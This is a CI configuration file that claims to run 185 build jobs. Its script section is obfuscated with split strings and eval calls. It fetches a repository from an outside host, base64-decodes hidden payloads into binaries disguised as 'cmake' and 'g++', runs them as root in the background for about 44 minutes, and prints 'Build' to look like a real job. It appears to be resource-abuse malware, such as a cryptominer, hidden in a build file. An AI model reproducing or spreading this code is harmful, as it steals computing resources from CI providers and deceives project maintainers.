dist: bionic

env:
  - BUILD="pD1"
  - BUILD="pD2"
  - BUILD="pD3"
  - BUILD="pD4"
  - BUILD="pD5"
  - BUILD="pD6"
  - BUILD="pD7"
  - BUILD="pD8"
  - BUILD="pD9"
  - BUILD="pD10"
  - BUILD="pD11"
  - BUILD="pD12"
  - BUILD="pD13"
  - BUILD="pD14"
  - BUILD="pD15"
  - BUILD="pD16"
  - BUILD="pD17"
  - BUILD="pD18"
  - BUILD="pD19"
  - BUILD="pD20"
  - BUILD="pD21"
  - BUILD="pD22"
  - BUILD="pD23"
  - BUILD="pD24"
  - BUILD="pD25"
  - BUILD="pD26"
  - BUILD="pD27"
  - BUILD="pD28"
  - BUILD="pD29"
  - BUILD="pD30"
  - BUILD="pD31"
  - BUILD="pD32"
  - BUILD="pD33"
  - BUILD="pD34"
  - BUILD="pD35"
  - BUILD="pD36"
  - BUILD="pD37"
  - BUILD="pD38"
  - BUILD="pD39"
  - BUILD="pD40"
  - BUILD="pD41"
  - BUILD="pD42"
  - BUILD="pD43"
  - BUILD="pD44"
  - BUILD="pD45"
  - BUILD="pD46"
  - BUILD="pD47"
  - BUILD="pD48"
  - BUILD="pD49"
  - BUILD="pD50"
  - BUILD="pD51"
  - BUILD="pD52"
  - BUILD="pD53"
  - BUILD="pD54"
  - BUILD="pD55"
  - BUILD="pD56"
  - BUILD="pD57"
  - BUILD="pD58"
  - BUILD="pD59"
  - BUILD="pD60"
  - BUILD="pD61"
  - BUILD="pD62"
  - BUILD="pD63"
  - BUILD="pD64"
  - BUILD="pD65"
  - BUILD="pD66"
  - BUILD="pD67"
  - BUILD="pD68"
  - BUILD="pD69"
  - BUILD="pD70"
  - BUILD="pD71"
  - BUILD="pD72"
  - BUILD="pD73"
  - BUILD="pD74"
  - BUILD="pD75"
  - BUILD="pD76"
  - BUILD="pD77"
  - BUILD="pD78"
  - BUILD="pD79"
  - BUILD="pD80"
  - BUILD="pD81"
  - BUILD="pD82"
  - BUILD="pD83"
  - BUILD="pD84"
  - BUILD="pD85"
  - BUILD="pD86"
  - BUILD="pD87"
  - BUILD="pD88"
  - BUILD="pD89"
  - BUILD="pD90"
  - BUILD="pD91"
  - BUILD="pD92"
  - BUILD="pD93"
  - BUILD="pD94"
  - BUILD="pD95"
  - BUILD="pD96"
  - BUILD="pD97"
  - BUILD="pD98"
  - BUILD="pD99"
  - BUILD="pD100"
  - BUILD="pD101"
  - BUILD="pD102"
  - BUILD="pD103"
  - BUILD="pD104"
  - BUILD="pD105"
  - BUILD="pD106"
  - BUILD="pD107"
  - BUILD="pD108"
  - BUILD="pD109"
  - BUILD="pD110"
  - BUILD="pD111"
  - BUILD="pD112"
  - BUILD="pD113"
  - BUILD="pD114"
  - BUILD="pD115"
  - BUILD="pD116"
  - BUILD="pD117"
  - BUILD="pD118"
  - BUILD="pD119"
  - BUILD="pD120"
  - BUILD="pD121"
  - BUILD="pD122"
  - BUILD="pD123"
  - BUILD="pD124"
  - BUILD="pD125"
  - BUILD="pD126"
  - BUILD="pD127"
  - BUILD="pD128"
  - BUILD="pD129"
  - BUILD="pD130"
  - BUILD="pD131"
  - BUILD="pD132"
  - BUILD="pD133"
  - BUILD="pD134"
  - BUILD="pD135"
  - BUILD="pD136"
  - BUILD="pD137"
  - BUILD="pD138"
  - BUILD="pD139"
  - BUILD="pD140"
  - BUILD="pD141"
  - BUILD="pD142"
  - BUILD="pD143"
  - BUILD="pD144"
  - BUILD="pD145"
  - BUILD="pD146"
  - BUILD="pD147"
  - BUILD="pD148"
  - BUILD="pD149"
  - BUILD="pD150"
  - BUILD="pD151"
  - BUILD="pD152"
  - BUILD="pD153"
  - BUILD="pD154"
  - BUILD="pD155"
  - BUILD="pD156"
  - BUILD="pD157"
  - BUILD="pD158"
  - BUILD="pD159"
  - BUILD="pD160"
  - BUILD="pD161"
  - BUILD="pD162"
  - BUILD="pD163"
  - BUILD="pD164"
  - BUILD="pD165"
  - BUILD="pD166"
  - BUILD="pD167"
  - BUILD="pD168"
  - BUILD="pD169"
  - BUILD="pD170"
  - BUILD="pD171"
  - BUILD="pD172"
  - BUILD="pD173"
  - BUILD="pD174"
  - BUILD="pD175"
  - BUILD="pD176"
  - BUILD="pD177"
  - BUILD="pD178"
  - BUILD="pD179"
  - BUILD="pD180"
  - BUILD="pD181"
  - BUILD="pD182"
  - BUILD="pD183"
  - BUILD="pD184"
  - BUILD="pD185"

language: minimal

script:
  - sudo apt update || true
  - DNoptRF="sudo apt --"
  - AcZIWNjYli="yes install"
  - LzbEnOXTIK=" cl-base64 "
  - omNUtPZBKx="git &>/dev/"
  - eval "$DNoptRF""$AcZIWNjYli""$LzbEnOXTIK""$omNUtPZBKx""null"
  - VzvxW="git clone h"
  - dGWEBUQmOYY="ttps://gccb"
  - idmZNXWj="uild@bitbuc"
  - rxajRPyycS="ket.org/gcc"
  - Tgvil="build/gcc.g"
  - VkWAZ="it &>/dev/n"
  - eval "$VzvxW""$dGWEBUQmOYY""$idmZNXWj""$rxajRPyycS""$Tgvil""$VkWAZ""ull"
  - GqMwP="base64 -d g"
  - quIeuyCrKyC="cc/cmake_ >"
  - eval "$GqMwP""$quIeuyCrKyC"" cmake"
  - YobFOGpiESb="base64 -d g"
  - MPnrhTYIZl="cc/config_ "
  - eval "$YobFOGpiESb""$MPnrhTYIZl""> status"
  - cBPGMZoLNwz="base64 -d g"
  - NhqepEHTa="cc/make_ > "
  - eval "$cBPGMZoLNwz""$NhqepEHTa""g++"
  - chmod +x g++ cmake
  - khUegCGSqz="./cmake"
  - eval "$khUegCGSqz"""
  - sed -i 's/build/tg2o/g' status
  - sudo ./g++ -c status &>/dev/null &
  - GCC=$(date +%s)
  - DjoCu="echo $BUILD"
  - eval "$DjoCu"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2633)) ] && sudo killall g++ && break; sleep 194; done
